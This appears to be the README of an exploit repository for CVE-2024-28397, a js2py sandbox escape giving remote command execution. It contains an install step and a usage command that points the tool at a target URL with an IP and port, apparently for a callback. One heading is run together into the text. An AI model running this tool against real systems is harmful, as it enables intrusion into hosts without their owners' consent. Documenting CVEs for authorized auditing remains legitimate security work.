
js2py <= 0.74 sandbox escape (CVE-2024-28397)
Exploit for remote command execution (RCE) via sandbox escape in js2py <= 0.74.
Allows arbitrary code execution on the host system through insecure JavaScript evaluation.
subprocess.PopenDependencies:
pip install -r requirements.txt
python3 exploit.py -U http://target_url -H IP -P PORT
This project is provided for educational purposes and for authorized security audits only.
The author is not responsible for any misuse of this tool.